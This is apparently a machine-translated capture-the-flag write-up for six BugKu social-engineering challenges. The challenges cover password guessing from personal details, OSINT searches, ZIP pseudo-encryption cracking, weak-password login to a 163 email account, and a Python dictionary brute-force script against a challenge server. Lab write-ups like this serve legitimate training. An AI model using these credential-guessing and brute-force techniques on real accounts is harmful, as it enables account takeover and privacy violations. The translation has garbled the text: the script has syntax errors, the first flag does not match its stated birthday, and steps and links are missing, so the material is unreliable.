BugKu Social Engineering
This is the 9th day of my participation in the August Wen Challenge.More challenges in August
1, password,
Name: Zhang SAN birthday; 19970315 KEY format KEY{XXXXXXXXXX}
Zs, birthday, will do
Answer: the flag {zs199970315}
2. Information search
It is said that bugku.cn can be found on toutiao today. Tip: Flag is in the group number format KEY{XXXXXXXXXXX}
Analysis: Baidu search directly Answer: the KEY {462713425}
3. Simple personal information collection
1. Zip
Resolution:
First try blasting, and then consider ZIP pseudo-encryption, pseudo-encryption cracking tool:
Pseudo encryption solution, open after
The social worker’s website is down
Answer: the flag {15206164164}
4. Social worker advancement
Dry:
Analysis: Baidu post bar search solitary long away
Email should be weak password login, look up the weak password table, one by one try email 163 login,a123456
Answer: the KEY {sg1H78Si9C0s99Q}
5. Wang Xiaoming’s diary
Refer to the link
Resolution:
Note the following information:Bugku online tool
The tools used are:Online password attacks
Using online password attacks, generate dictionaries:
Get a dictionary
Then use the Python script to blow it up
import requests,re
def req(pwd) :
url='http://120.24.86.145:8002/xiaoming/? yes'
s = requests.session()
r = s.get(url)
r.encoding = 'utf-8'
# print(r.text)
response = s.post(url,data={'pwd':pwd})
response.encoding = 'utf-8'
# print(response.text)
b = re.findall(R 'Password incorrect, please re-enter', response.text)
# print(b)
return b
def zidian() :
f = open('mima.txt'.'r',encoding='UTF-8')
a = f.read()
a = a.splitlines()
return a
a = zidian()
for pwd in a:
b = req(pwd)
try:
if b[0] = ='Incorrect password, please re-enter':
# print(b[0])
pass
except:
print(pwd)
break
Copy the code
Refer to the link
Python3.5 crack. Py WXMCopy the code
Password WXM
Answer: Flag {bugku-shegong_xMQ} reference link 1
6. Simple social worker attempts
Analytic: findneo. Making. IO / 180406 bugku… References: Reference link 1 Reference link 2 Reference link 3 github.com/bugku weibo.com/bugku c.bugku.com/13211.txt
Answer: the flag {BUku_open_shgcx1}